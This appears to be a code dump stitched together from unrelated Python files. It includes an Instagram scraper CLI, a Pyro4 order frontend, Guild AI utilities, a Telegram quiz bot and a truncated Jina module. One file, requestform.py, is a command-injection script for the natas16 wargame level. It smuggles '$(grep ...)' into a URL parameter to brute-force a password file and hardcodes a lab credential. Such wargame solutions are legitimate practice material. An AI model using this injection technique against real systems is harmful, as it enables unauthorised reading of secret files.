parser.add_argument("--jobs", type=int, dest="jobs", default=cpu_count, help="thread number")
parser.add_argument('--version', action='version', version=__version__)
args = parser.parse_args()
Run()
|
crawler.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import argparse
import json
import sys
from io import open
from threading import Thread
from elasticsearch_dsl import connections
from inscrawler import InsCrawler
from inscrawler.elastic import get_unchecked_profiles, get_unchecked_targets
from inscrawler.settings import override_settings
from inscrawler.settings import prepare_override_settings
from inscrawler.settings import settings
def usage():
return """
python crawler.py posts -u cal_foodie -n 100 -o ./output
python crawler.py posts_full -u cal_foodie -n 100 -o ./output
python crawler.py profile -u cal_foodie -o ./output
python crawler.py profile_script -u cal_foodie -o ./output
python crawler.py hashtag -t taiwan -o ./output
The default number for fetching posts via hashtag is 100.
"""
def get_posts_by_user(username, number, detail, debug):
if username:
ins_crawler = InsCrawler(has_screen=debug)
if settings.login:
ins_crawler.login()
return ins_crawler.get_user_posts(username, number, detail)
else:
pass
def get_profile(username):
ins_crawler = InsCrawler()
return ins_crawler.get_user_profile(username)
def get_profile_from_script(username):
ins_cralwer = InsCrawler()
return ins_cralwer.get_user_profile_from_script_shared_data(username)
def get_posts_by_hashtag(tag, number, debug):
ins_crawler = InsCrawler(has_screen=debug)
return ins_crawler.get_latest_posts_by_tag(tag, number)
def get_popular_users(starting_user, debug, threads_number):
if not threads_number:
threads_number = 4
users_list = get_unchecked_profiles(threads_number)
for hits in users_list:
ins_crawler = InsCrawler(has_screen=debug)
if settings.login:
ins_crawler.login()
Thread(target=ins_crawler.check_popular_profiles_elastic, args=(hits,)).start()
def check_targets(debug, threads_number):
if not threads_number:
threads_number = 4
targets_list = get_unchecked_targets(threads_number)
for hits in targets_list:
ins_crawler = InsCrawler(has_screen=debug)
if settings.login:
ins_crawler.login()
Thread(target=ins_crawler.check_targets, args=(hits,)).start()
def arg_required(args, fields=[]):
for field in fields:
if not getattr(args, field):
parser.print_help()
sys.exit()
def output(data, filepath):
out = json.dumps(data, ensure_ascii=False)
if filepath:
with open(filepath, "w", encoding="utf8") as f:
f.write(out)
else:
print(out)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Instagram Crawler", usage=usage())
parser.add_argument(
"mode", help="options: [posts, posts_full, profile, profile_script, hashtag, popular, target]"
)
parser.add_argument("-n", "--number", type=int, help="number of returned posts")
parser.add_argument("-i", "--instance", type=int, help="number of threads")
parser.add_argument("-u", "--username", help="instagram's username")
parser.add_argument("-t", "--tag", help="instagram's tag name")
parser.add_argument("-o", "--output", help="output file name(json format)")
parser.add_argument("--debug", action="store_true")
prepare_override_settings(parser)
args = parser.parse_args()
override_settings(args)
if settings.elastic:
connections.create_connection(hosts=['localhost'], timeout=20)
if args.mode in ["posts", "posts_full"]:
arg_required("username")
output(
get_posts_by_user(
args.username, args.number, args.mode == "posts_full", args.debug
),
args.output,
)
elif args.mode == "profile":
arg_required("username")
output(get_profile(args.username), args.output)
elif args.mode == "profile_script":
arg_required("username")
output(get_profile_from_script(args.username), args.output)
elif args.mode == "hashtag":
arg_required("tag")
output(
get_posts_by_hashtag(args.tag, args.number or 100, args.debug), args.output
)
elif args.mode == "popular":
# arg_required("username")
output(get_popular_users(args.username, args.debug, args.instance), args.output)
elif args.mode == "target":
output(check_targets(args.debug, args.instance), args.output)
else:
usage()
|
frontend.py
|
#!/usr/bin/python3
""" User Client """
import json
import socketserver
import sys
import Pyro4
# TODO: work out what is throwing errors
# TODO: get server polling code to change server status if there is an outage.
class FrontEnd(object):
def __init__(self):
ns = Pyro4.locateNS()
self.server_uris = [ns.lookup("OrderManager1"), ns.lookup("OrderManager2"), ns.lookup("OrderManager3")]
self.serverlist = []
for uri in self.server_uris:
self.serverlist.append(Pyro4.Proxy(uri))
self.server = self.serverlist[0]
self.server.set_primary_state(True)
# update server lists
for s in self.serverlist:
s.set_servers(self.server_uris)
print(self.server_uris)
def process_command(self, data):
print("Frontend data: ", data)
command = data['action']
userid = data['userid']
input = data['data']
if not userid:
return "No USERID specified"
if command == "ADD":
print("Running Action Frontend")
items_to_order = input.split(',')
if len(items_to_order) > 3 or len(items_to_order) == 0:
return "Must enter at least 1 item, and no more than 3."
# deal with batch stuff, to
results = self.server.place_order(userid, items_to_order)
# todo check length to make sure a server is online.
return str(results)
elif command == "DELETE":
print("running delete front end")
del_index = input
results = self.server.cancel_order(userid, del_index)
# todo check results to ensure things are fine :D
return str(results)
elif command == "HISTORY":
print("Running History frontend")
results = self.server.get_order_history(userid)
print("Frontend results: ", results)
# todo remove batch processing for this (no CUD needed, only R).
return str(results)
else:
return "Command not found. Please try again"
class MyServer(socketserver.BaseRequestHandler):
def handle(self):
server = FrontEnd()
data = self.request.recv(1024).strip()
data = data.decode()
data_dict = json.loads(data)
res = server.process_command(data_dict)
# server log now
print("Frontend: ", res)
response = res.encode()
print("Frontend encoded: ", response)
self.request.sendall(response)
def main(host, port):
# for i in range(1, 4):
# t = threading.Thread(target=order_server.main, args=[i])
# t.daemon = True
# t.start()
server = socketserver.TCPServer((host, port), MyServer)
server.serve_forever()
if __name__ == "__main__":
print("Arguments frontend: ", sys.argv)
hostname = sys.argv[1]
portnum = int(sys.argv[2])
main(hostname, portnum)
|
op_util.py
|
# Copyright 2017-2019 TensorHub, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import fnmatch
import csv
import hashlib
import logging
import re
import os
import shlex
import shutil
import struct
import sys
import threading
import time
import six
from six.moves import shlex_quote
import yaml
# Move any import that's expensive or seldom used into function
from guild import util
log = logging.getLogger("guild")
# Legacy support for functionality moved to _api
from guild import _api
NoCurrentRun = _api.NoCurrentRun
current_run = _api.current_run
function_pattern = re.compile(r"([a-zA-Z0-9_\-\.]*)\[(.*)\]\s*$")
function_arg_delimiter = ":"
RESTART_NEEDED_STATUS = ("pending",)
class ArgValueError(ValueError):
def __init__(self, arg):
super(ArgValueError, self).__init__(arg)
self.arg = arg
class MissingRequiredFlags(ValueError):
def __init__(self, missing):
super(MissingRequiredFlags, self).__init__(missing)
self.missing = missing
class InvalidFlagChoice(ValueError):
def __init__(self, val, flag):
super(InvalidFlagChoice, self).__init__(val, flag)
self.val = val
self.flag = flag
class InvalidFlagValue(ValueError):
def __init__(self, val, flag, msg):
super(InvalidFlagValue, self).__init__(val, flag, msg)
self.val = val
self.flag = flag
self.msg = msg
class ProcessError(Exception):
pass
class RunOutput(object):
DEFAULT_WAIT_TIMEOUT = 10
def __init__(self, run, proc=None, quiet=False, output_cb=None):
assert run
self._run = run
self._quiet = quiet
self._output_cb = output_cb
self._output_lock = threading.Lock()
self._open = False
self._proc = None
self._output = None
self._index = None
self._out_tee = None
self._err_tee = None
if proc:
self.open(proc)
@property
def closed(self):
return not self._open
def open(self, proc):
self._assert_closed()
if proc.stdout is None:
raise RuntimeError("proc stdout must be a PIPE")
if proc.stderr is None:
raise RuntimeError("proc stderr must be a PIPE")
self._proc = proc
self._output = self._open_output()
self._index = self._open_index()
self._out_tee = threading.Thread(target=self._out_tee_run)
self._err_tee = threading.Thread(target=self._err_tee_run)
self._out_tee.start()
self._err_tee.start()
self._open = True
def _assert_closed(self):
if self._open:
raise RuntimeError("already open")
assert self._proc is None
assert self._output is None
assert self._index is None
assert self._out_tee is None
assert self._err_tee is None
def _open_output(self):
path = self._run.guild_path("output")
return open(path, "wb")
def _open_index(self):
path = self._run.guild_path("output.index")
return open(path, "wb")
def _out_tee_run(self):
assert self._proc
self._gen_tee_run(self._proc.stdout, sys.stdout, 0)
def _err_tee_run(self):
assert self._proc
self._gen_tee_run(self._proc.stderr, sys.stderr, 1)
def _gen_tee_run(self, input_stream, output_stream, stream_type):
assert self._output
assert self._index
os_read = os.read
os_write = os.write
input_fileno = input_stream.fileno()
if not self._quiet:
stream_fileno = output_stream.fileno()
else:
stream_fileno = None
output_fileno = self._output.fileno()
index_fileno = self._index.fileno()
time_ = time.time
lock = self._output_lock
line = []
while True:
b = os_read(input_fileno, 1)
if not b:
break
with lock:
if stream_fileno is not None:
os_write(stream_fileno, b)
if b < b"\x09": # non-printable
continue
line.append(b)
if b == b"\n":
line_bytes = b"".join(line)
os_write(output_fileno, line_bytes)
line = []
entry = struct.pack(
"!QB", int(time_() * 1000), stream_type)
os_write(index_fileno, entry)
if self._output_cb:
try:
self._output_cb.write(line_bytes)
except Exception:
log.exception(
"error in output callback (will be removed)")
self._output_cb = None
def wait(self, timeout=DEFAULT_WAIT_TIMEOUT):
self._assert_open()
self._out_tee.join(timeout)
self._err_tee.join(timeout)
def _assert_open(self):
if not self._open:
raise RuntimeError("not open")
assert self._proc
assert self._output
assert self._index
assert self._out_tee
assert self._err_tee
def close(self):
lock = self._acquire_output_lock()
try:
self._close()
finally:
lock.release()
def _acquire_output_lock(self, timeout=60):
"""Polling verison of acquire to support timeouts on Python 2."""
timeout_at = time.time() + timeout
while time.time() < timeout_at:
if self._output_lock.acquire(False):
return self._output_lock
time.sleep(1)
raise RuntimeError("timeout")
def _close(self):
self._assert_open()
self._output.close()
self._index.close()
if self._output_cb:
try:
self._output_cb.close()
except Exception:
log.exception("closing output callback")
assert not self._out_tee.is_alive()
assert not self._err_tee.is_alive()
self._proc = None
self._output = None
self._index = None
self._out_tee = None
self._err_tee = None
self._open = False
def wait_and_close(self, timeout=DEFAULT_WAIT_TIMEOUT):
self.wait(timeout)
self.close()
def resolve_file(filename):
return util.find_apply([
_abs_file,
_cmd_file,
_model_file,
_cwd_file
], filename)
def _abs_file(filename):
if os.path.isabs(filename):
return filename
return None
def _cmd_file(filename):
assert "CMD_DIR" in os.environ
filename = os.path.join(os.environ["CMD_DIR"], filename)
if os.path.exists(filename):
return filename
return None
def parse_flags(args):
return dict([parse_flag_arg(os.path.expanduser(arg)) for arg in args])
def parse_flag_arg(arg):
parts = arg.split("=", 1)
if len(parts) == 1:
raise ArgValueError(arg)
else:
return parts[0], parse_arg_val(parts[1])
def parse_arg_val(s):
if s == "":
return s
parsers = [
(int, ValueError),
(float, ValueError),
(_yaml_parse, (ValueError, yaml.YAMLError)),
]
for p, e_type in parsers:
try:
return p(s)
except e_type:
pass
return s
def _yaml_parse(s):
"""Uses yaml module to parse s to a Python value.
First tries to parse as an unnamed flag function with at least two
args and, if successful, returns s unmodified. This prevents yaml
from attempting to parse strings like '1:1' which it considers to
be timestamps.
"""
try:
name, args = parse_function(s)
except ValueError:
pass
else:
if name is None and len(args) >= 2:
return s
return yaml.safe_load(s)
def format_flag_val(val):
if val is True:
return "yes"
elif val is False:
return "no"
elif val is None:
return "null"
elif isinstance(val, list):
return _format_flag_list(val)
elif isinstance(val, (six.string_types, float)):
return _yaml_format(val)
else:
return str(val)
def _format_flag_list(val_list):
joined = ", ".join([format_flag_val(val) for val in val_list])
return "[%s]" % joined
def _yaml_format(val):
formatted = yaml.safe_dump(val).strip()
if formatted.endswith("\n..."):
formatted = formatted[:-4]
return formatted
def format_flag_arg(name, val):
return "%s=%s" % (name, format_flag_val(val))
class TFEvents(object):
def __init__(self, logdir):
self.logdir = logdir
self._writer = None
def add_scalars(self, scalars, global_step=None):
self._ensure_writer()
self._writer.add_summary(self._scalars_summary(scalars), global_step)
@staticmethod
def _scalars_summary(scalars):
import tensorflow as tf
value = [
tf.summary.Summary.Value(tag=tag, simple_value=val)
for tag, val in scalars
]
return tf.summary.Summary(value=value)
def _ensure_writer(self):
import tensorflow as tf
if not self._writer:
self._writer = tf.summary.FileWriter(self.logdir, max_queue=0)
def flush(self):
if self._writer:
self._writer.flush()
def close(self):
if self._writer:
self._writer.close()
self._writer = None
def __enter__(self):
return self
def __exit__(self, *_args):
self.close()
def tfevents(subdir=None, run=None):
if not run:
run = current_run()
if subdir:
logdir = os.path.join(run.path, subdir)
else:
logdir = run.path
return TFEvents(logdir)
def exit(msg, exit_status=1):
"""Exit the Python runtime with a message.
"""
sys.stderr.write(os.path.basename(sys.argv[0]))
sys.stderr.write(": ")
sys.stderr.write(msg)
sys.stderr.write("\n")
sys.exit(exit_status)
def parse_op_args(args):
if len(args) < 2:
exit("usage: %s COMMAND [ARG...]" % args[0])
return args[1], args[2:]
def args_to_flags(args):
flags, _args = args_to_flags2(args)
return flags
def args_to_flags2(args):
flags = {}
extra = []
name = None
for arg in args:
if arg[:2] == "--":
name = arg[2:]
flags[name] = True
elif arg[:1] == "-":
val = parse_arg_val(arg)
if isinstance(val, (int, float)):
flags[name] = val
elif len(arg) == 2:
name = arg[1]
flags[name] = True
elif len(arg) > 2:
name = None
flags[arg[1]] = arg[2:]
elif name is not None:
flags[name] = parse_arg_val(arg)
name = None
else:
extra.append(arg)
return flags, extra
def global_dest(global_name, flags):
dest = cur = {}
for name in global_name.split("."):
cur = cur.setdefault(name, {})
cur.update(flags)
return dest
def find_file(path):
return util.find_apply([_cwd_file, _model_file], path)
def _cwd_file(path):
if os.path.exists(path):
return path
return None
def _model_file(path):
model_path = os.getenv("MODEL_PATH")
if model_path:
for root in model_path.split(os.path.pathsep):
full_path = os.path.join(root, path)
if os.path.exists(full_path):
return full_path
return None
def coerce_flag_value(val, flagdef):
"""Coerces a flag value based on flagdef settings."""
if val is None or not flagdef or not flagdef.type:
return val
if isinstance(val, list):
return [coerce_flag_value(x, flagdef) for x in val]
elif flagdef.type == "string":
return _try_coerce_flag_val(val, str, flagdef)
elif flagdef.type == "int":
if isinstance(val, float):
raise ValueError("invalid value for type 'int'")
return _try_coerce_flag_val(val, int, flagdef)
elif flagdef.type == "float":
return _try_coerce_flag_val(val, float, flagdef)
elif flagdef.type == "number":
if isinstance(val, (float, int)):
return val
return _try_coerce_flag_val(val, (int, float), flagdef)
elif flagdef.type in ("path", "existing-path"):
return _resolve_rel_path(val)
else:
log.warning(
"unknown flag type '%s' for %s - cannot coerce",
flagdef.type, flagdef.name)
return val
def _try_coerce_flag_val(val, funs, flagdef):
if not isinstance(funs, tuple):
funs = (funs,)
for f in funs:
try:
return f(val)
except ValueError as e:
log.debug("value error applying %s to %r: %s", f, val, e)
raise ValueError("invalid value for type '%s'" % flagdef.type)
def _resolve_rel_path(val):
if val and not os.path.isabs(val):
return os.path.abspath(val)
return val
def validate_flag_vals(vals, opdef):
_check_missing_flags(vals, opdef)
_check_flag_vals(vals, opdef)
def _check_missing_flags(vals, opdef):
missing = _missing_flags(vals, opdef)
if missing:
raise MissingRequiredFlags(missing)
def _missing_flags(vals, opdef):
return [
flag for flag in opdef.flags
if flag.required and _flag_missing(vals.get(flag.name))
]
def _flag_missing(val):
if val is None or val == "":
return True
return False
def _check_flag_vals(vals, opdef):
for flag in opdef.flags:
val = vals.get(flag.name)
_check_flag_choice(val, flag)
_check_flag_type(val, flag)
_check_flag_range(val, flag)
def _check_flag_choice(val, flag):
if (val and flag.choices and not flag.allow_other and
val not in [choice.value for choice in flag.choices]):
raise InvalidFlagChoice(val, flag)
def _check_flag_type(val, flag):
if flag.type == "existing-path":
if val and not os.path.exists(val):
raise InvalidFlagValue(val, flag, "%s does not exist" % val)
def _check_flag_range(val, flag):
if val is None:
return
if flag.min is not None and val < flag.min:
raise InvalidFlagValue(
val, flag, "out of range (less than min %s)" % flag.min)
if flag.max is not None and val > flag.max:
raise InvalidFlagValue(
val, flag, "out of range (greater than max %s)" % flag.max)
def copy_source(run, opdef):
_copy_source(
opdef.guildfile.dir,
opdef.modeldef.source,
run.guild_path("source"))
def _copy_source(src_base, source_config, dest_base):
to_copy = _source_to_copy(src_base, source_config)
if not to_copy:
log.debug("no source to copy")
return
for src, src_rel_path in to_copy:
dest = os.path.join(dest_base, src_rel_path)
log.debug("copying source %s to %s", src, dest)
util.ensure_dir(os.path.dirname(dest))
_try_copy_file(src, dest)
def _source_to_copy(src_dir, source_config):
to_copy = []
seen_dirs = set()
for root, dirs, files in os.walk(src_dir, followlinks=True):
seen_dirs.add(os.path.realpath(root))
_del_excluded_dirs(dirs, root, seen_dirs)
for name in files:
path = os.path.join(root, name)
rel_path = os.path.relpath(path, src_dir)
if _to_copy(path, rel_path, source_config):
to_copy.append((path, rel_path))
return to_copy
def _try_copy_file(src, dest):
try:
shutil.copyfile(src, dest)
except (IOError, OSError) as e:
# This is not an error we want to stop an operation for. Log
# and continue.
if log.getEffectiveLevel() <= logging.DEBUG:
log.exception("copy %s to %s", src, dest)
else:
log.warning("could not copy source file %s: %s", src, e)
def _del_excluded_dirs(dirs, root, seen_dirs):
_del_env_dirs(dirs, root)
_del_dot_dir(dirs)
_del_seen_dirs(dirs, root, seen_dirs)
def _del_env_dirs(dirs, root):
for name in dirs:
if _is_env_dir(os.path.join(root, name)):
dirs.remove(name)
def _del_dot_dir(dirs):
for d in list(dirs):
if d[:1] == ".":
dirs.remove(d)
def _del_seen_dirs(dirs, root, seen):
for dir_name in dirs:
real_path = os.path.realpath(os.path.join(root, dir_name))
if real_path in seen:
dirs.remove(dir_name)
def _is_env_dir(path):
return os.path.exists(os.path.join(path, "bin", "activate"))
def _to_copy(path, rel_path, source_config):
last_match = None
for spec in source_config.specs:
if _source_match(rel_path, spec):
last_match = spec
if last_match:
return _to_copy_for_spec(last_match)
return _is_text_file(path)
def _source_match(rel_path, spec):
return any((fnmatch.fnmatch(rel_path, p) for p in spec.patterns))
def _to_copy_for_spec(spec):
return spec.type == "include"
def _is_text_file(path):
from guild import binaryornot
return not binaryornot.is_binary(path)
def split_main(main):
if isinstance(main, list):
return main
# If main is None, this call will block (see
# https://bugs.python.org/issue27775)
return shlex.split(main or "")
# Alias
split_cmd = split_main
def wait_for_proc(p, stop_after_min, poll_interval=5, kill_delay=30):
stop_at = time.time() + stop_after_min * 60
while time.time() < stop_at:
time.sleep(poll_interval)
returncode = p.poll()
if returncode is not None:
return returncode
log.info(
"Stopping process early (pid %i) - %i minute(s) elapsed",
p.pid, stop_after_min)
return _terminate(p, poll_interval, kill_delay)
def _terminate(p, poll_interval, kill_delay):
kill_at = time.time() + kill_delay
p.terminate()
while p.poll() is None and time.time() < kill_at:
time.sleep(poll_interval)
if p.poll() is None:
log.warning("Process did not terminate (pid %i), killing", p.pid)
p.kill()
time.sleep(poll_interval)
returncode = p.poll()
if returncode not in (0, -15):
raise ProcessError(
"Process did not terminate gracefully (pid %i)"
% p.pid)
return returncode
def init_logging():
import guild.log
level = int(os.getenv("LOG_LEVEL", logging.WARN))
format = os.getenv("LOG_FORMAT", "%(levelname)s: [%(name)s] %(message)s")
guild.log.init_logging(level, {"_": format})
globals()["log"] = logging.getLogger("guild")
def print_trials(trials):
from guild import cli
data, cols = _trials_table_data(trials)
cli.table(data, cols)
def _trials_table_data(trials):
names = set()
data = []
for i, flags in enumerate(trials):
row = {"_trial": i + 1}
data.append(row)
if flags:
row.update(
{name: format_flag_val(flags[name])
for name in flags})
names.update(flags)
heading = {name: name for name in names}
heading["_trial"] = "#"
return [heading] + data, ["_trial"] + sorted(names)
def save_trials(trials, path):
data, cols = _trials_table_data(trials)
cols.remove("_trial") # Don't include trial number in CSV
with open(path, "w") as f:
out = csv.writer(f)
for row in data:
out.writerow([row.get(name, "") for name in cols])
def op_flag_encoder(op):
import importlib
spec = op.opdef.flag_encoder
if not spec:
return None
parts = spec.split(":")
if len(parts) != 2:
log.warning(
"invalid flag decoder %r - must be MODULE:FUNCTION",
spec)
return None
mod_name, fun_name = parts
try:
mod = importlib.import_module(mod_name)
except Exception as e:
if log.getEffectiveLevel() <= logging.DEBUG:
log.exception("importing %s", mod_name)
else:
log.warning(
"cannot load flag decoder %r: %s",
spec, e)
return None
fun = getattr(mod, fun_name, None)
if fun is None:
log.warning(
"cannot load flag decoder %r: no such attribute in %s",
spec, mod_name)
return None
return fun
def ensure_exit_status(run, exit_status):
from guild import op as oplib
run_exit_status = run.get("exit_status")
if run_exit_status is None:
run.write_attr("exit_status", exit_status)
oplib.delete_pending(run)
def format_op_desc(run, nowarn=False, seen_protos=None):
seen_protos = seen_protos or set()
opref = run.opref
base_desc = _base_op_desc(opref, nowarn)
return _apply_batch_desc(base_desc, run, seen_protos)
def _base_op_desc(opref, nowarn):
if opref.pkg_type == "guildfile":
return _format_guildfile_op(opref)
elif opref.pkg_type == "package":
return _format_package_op(opref)
elif opref.pkg_type == "script":
return _format_script_op(opref)
elif opref.pkg_type == "builtin":
return _format_builtin_op(opref)
elif opref.pkg_type == "pending":
return _format_pending_op(opref)
elif opref.pkg_type == "test":
return _format_test_op(opref)
else:
if not nowarn:
log.warning(
"cannot format op desc, unexpected pkg type: %s (%s)",
opref.pkg_type, opref.pkg_name)
return "?"
def _format_guildfile_op(opref):
parts = []
gf_dir = _guildfile_dir(opref)
if gf_dir:
parts.extend([gf_dir, os.path.sep])
if opref.model_name:
parts.extend([opref.model_name, ":"])
parts.append(opref.op_name)
return "".join(parts)
def _guildfile_dir(opref):
from guild import config
gf_dir = os.path.dirname(opref.pkg_name)
relpath = os.path.relpath(gf_dir, config.cwd())
if relpath == ".":
return ""
return re.sub(r"\.\./(\.\./)+", ".../", _ensure_dot_path(relpath))
def _ensure_dot_path(path):
if path[0:1] == ".":
return path
return os.path.join(".", path)
def _format_package_op(opref):
return "%s/%s:%s" % (opref.pkg_name, opref.model_name, opref.op_name)
def _format_script_op(opref):
return _format_guildfile_op(opref)
def _format_builtin_op(opref):
return opref.op_name
def _format_pending_op(opref):
return "<pending %s>" % opref.op_name
def _format_test_op(opref):
return "%s:%s" % (opref.model_name, opref.op_name)
def _apply_batch_desc(base_desc, run, seen_protos):
import guild.run
try:
proto_dir = run.guild_path("proto")
except TypeError:
# Occurs for run proxies that don't support guild_path - punt
# with generic descriptor. (TODO: implement explicit behavior
# in run interface + proxy)
proto_dir = ""
if not os.path.exists(proto_dir):
return base_desc
if proto_dir in seen_protos:
# We have a cycle - drop this proto_dir
return base_desc
proto_run = guild.run.Run("", proto_dir)
proto_op_desc = format_op_desc(proto_run, seen_protos)
parts = [proto_op_desc]
if not base_desc.startswith("+"):
parts.append("+")
parts.append(base_desc)
return "".join(parts)
def run_params_for_restart(run, user_specified_params=None):
"""Returns params for use in run command for a restart of run.
The set of applicable params in the run "run_params" attribute are
considered. If user_specified_params contains a non-default value
(i.e. the user has indicated she wants to use a specific value)
that param will not be included in the result. If
user_specified_params is None (default) then all applicable params
for a restart that are defined in run are returned.
"""
# Note about applicable run params:
#
# A limited number of params could possibly apply to args - those
# are listed here. This list has to be maintained as new args are
# added to the run command. Params must be included where the user
# would reasonably assume applicability and never in cases where
# the use of the parameter would be clearly surprising to the user
# (e.g. reusing the 'yes' param, which would alter the expected
# behavior of the command on a restart/rerun).
#
# Params that are saved as run attrs or otherwise available under
# the run guild path (e.g. opspec, label, flags) should NOT be
# returned in this value in the interest of elimiting redundancy
# and potential mismtach bugs. Anyone needing those values MUST
# read them via run attrs or applicable run interface
# (e.g. opref in the case of opsec).
#
applicable_run_params = [
"disable_plugins",
"force_flags",
"gpus",
"max_trials",
"maximize",
"minimize",
"no_gpus",
"opt_flags",
"optimizer",
"random_seed",
]
from guild.commands.run import run as run_cmd
run_params = run.get("run_params", {})
if not isinstance(run_params, dict):
return
baseline_params = run_cmd.make_context("", []).params
result = {}
for name in run_params:
val = _coerce_run_param(name, run_params[name])
if name not in applicable_run_params:
continue
if user_specified_params is None:
result[name] = val
continue
try:
user_specified_val = user_specified_params[name]
except KeyError:
result[name] = val
continue
if user_specified_val != baseline_params[name]:
continue
result[name] = val
return result
def _coerce_run_param(name, val):
"""Ensures that named param is valid for the run command."""
if name == "flags":
return tuple(val)
return val
def flags_hash(flags):
flag_parts = [
"%s:%s" % (name, format_flag_val(val))
for name, val in sorted(flags.items())
]
to_hash = "\n".join(flag_parts).encode()
return hashlib.md5(to_hash).hexdigest()
def restart_needed(run, flags):
return run.status in RESTART_NEEDED_STATUS or run.get("flags") != flags
def parse_function(s):
if not isinstance(s, six.string_types):
raise ValueError("requires string")
m = function_pattern.match(s)
if not m:
raise ValueError("not a function")
name = m.group(1) or None
args_raw = m.group(2).strip()
if args_raw:
args_s = args_raw.split(function_arg_delimiter)
else:
args_s = []
args = [parse_arg_val(arg.strip()) for arg in args_s]
return name, tuple(args)
def flag_assigns(flags):
def fmt(val):
if isinstance(val, float):
val = round(val, 4)
return shlex_quote(format_flag_val(val))
return [
"%s=%s" % (name, fmt(flags[name]))
for name in sorted(flags)
]
def opdef_model_paths(opdef):
return _opdef_paths(opdef) + _model_parent_paths(opdef.modeldef)
def _opdef_paths(opdef):
if not opdef.guildfile.dir:
return []
abs_gf_dir = os.path.abspath(opdef.guildfile.dir)
if opdef.python_path is not None:
return [os.path.join(abs_gf_dir, p) for p in opdef.python_path]
return [abs_gf_dir]
def _model_parent_paths(modeldef):
return [os.path.abspath(parent.dir) for parent in modeldef.parents]
def _patch_yaml_safe_loader():
# Credit: https://stackoverflow.com/users/1307905/anthon
# Ref: https://stackoverflow.com/questions/30458977/
# yaml-loads-5e-6-as-string-and-not-a-number
loader = yaml.SafeLoader
loader.add_implicit_resolver(
u'tag:yaml.org,2002:float',
re.compile(u'''^(?:
[-+]?(?:[0-9][0-9_]*)\\.[0-9_]*(?:[eE][-+]?[0-9]+)?
|[-+]?(?:[0-9][0-9_]*)(?:[eE][-+]?[0-9]+)
|\\.[0-9_]+(?:[eE][-+][0-9]+)?
|[-+]?[0-9][0-9_]*(?::[0-5]?[0-9])+\\.[0-9_]*
|[-+]?\\.(?:inf|Inf|INF)
|\\.(?:nan|NaN|NAN))$''', re.X),
list(u'-+0123456789.'))
_patch_yaml_safe_loader()
|
bot.py
|
# coding: utf-8
import logging
import schedule
import time
import threading
import settings
from telegram.ext import Updater, CommandHandler, CallbackQueryHandler
from storage import connect_to_database
from models import User
from template_helper import render
from keyboards import KeyboardBuilder
from commands.question import AskQuestion, QueryHandler, choose_question
from commands.clear_data import ClearData
from commands.start import Start
from commands.help import Help
from commands.statistics import Statistics
from commands.auto_question import EnableAutoQuestion, DisableAutoQuestion
# Setup logging
logging.basicConfig(
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO
)
logger = logging.getLogger(__name__)
def enviar_questao_automatica(bot):
def task():
users = User.objects(questao_automatica_ativa=True)
for user in users:
questao = choose_question(user)
text = render('questao.tpl', questao=questao)
keyboard = KeyboardBuilder.answer_keyboard(questao)
bot.sendMessage(text=text,
reply_markup=keyboard,
chat_id=user.chat_id,
parse_mode='html')
return task
def error(bot, update, error):
logger.warn('Update "%s" caused error "%s"' % (update, error))
def task_runner():
while True:
schedule.run_pending()
time.sleep(1)
def main():
connect_to_database()
updater = Updater(settings.API_KEY)
schedule.every().day.at(settings.AUTO_QUESTION_TIME).do(
enviar_questao_automatica(updater.bot))
dp = updater.dispatcher
dp.add_handler(CommandHandler("start", Start()))
dp.add_handler(CommandHandler("help", Help()))
dp.add_handler(CommandHandler("perguntar", AskQuestion()))
dp.add_handler(CommandHandler("estatisticas", Statistics()))
dp.add_handler(CommandHandler("limpar_dados", ClearData()))
dp.add_handler(CommandHandler("ativar_questao_automatica", EnableAutoQuestion()))
dp.add_handler(CommandHandler("desativar_questao_automatica", DisableAutoQuestion()))
dp.add_handler(CallbackQueryHandler(QueryHandler()))
dp.add_error_handler(error)
updater.start_polling()
thread = threading.Thread(target=task_runner)
thread.daemon = True
thread.start()
updater.idle()
if __name__ == '__main__':
main()
|
requestform.py
|
from threading import Thread
import requests
from requests.auth import HTTPBasicAuth
import time
cSetReady = 0
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
filtered = chars
passwd = ''
url = 'http://natas16.natas.labs.overthewire.org/index.php?needle='
usr = 'natas16'
pwd = 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'
param = 'username'
SQLi = 'doomed$(grep {} /etc/natas_webpass/natas17)'
correctResponse = 'doomed'
browser = requests.Session()
browser.auth = (usr, pwd)
def inject(char):
global passwd
payload = SQLi.format('^' + passwd + char)
r = browser.get(url + payload)
if not correctResponse in r.text :
passwd += char
print(passwd)
"""
def getCharSet(char):
global filtered
global cSetReady
payload = SQLi.format('%' + char + '%')
Data = { param : payload }
r = browser.post(url, data=Data)
if correctResponse in r.text :
filtered += char
cSetReady += 1
print('getting charset .... ')
for char in chars:
Thread(target=getCharSet, args={char}).start()
while cSetReady != len(chars):
pass
print("Filter : " + filtered)
"""
for i in range(0,32):
for char in filtered:
check = len(passwd)
if len(passwd) == check :
Thread(target=inject, args={char}).start()
else:
break;
while len(passwd) == check and not len(passwd) == 32:
pass
|
base.py
|
import argparse
import base64
import copy
import itertools
import json
import os
import re
import sys
import threading
import time
import uuid
import warnings
from collections import OrderedDict
from contextlib import ExitStack
from typing import Optional, Union, Tuple, List, Set, Dict, overload, Type
from .builder import allowed_levels, _hanging_pods
from .. import __default_host__
from ..clients import Client
from ..clients.mixin import AsyncPostMixin, PostMixin
from ..enums import (
FlowBuildLevel,
PodRoleType,
FlowInspectType,
GatewayProtocolType,
InfrastructureType,
PollingType,
)
from ..excepts import (
FlowTopologyError,
FlowMissingPodError,
RoutingTableCyclicError,
RuntimeFailToStart,
)
from ..helper import (
colored,
get_public_ip,
get_internal_ip,
typename,
ArgNamespace,
download_mermaid_url,
CatchAllCleanupContextManager,
)
from ..jaml import JAMLCompatible
from ..logging.logger import JinaLogger
from ..parsers import set_gateway_parser, set_pod_parser, set_client_cli_parser
from ..parsers.flow import set_flow_parser
from ..peapods import CompoundPod, Pod
from ..peapods.pods.k8s import K8sPod
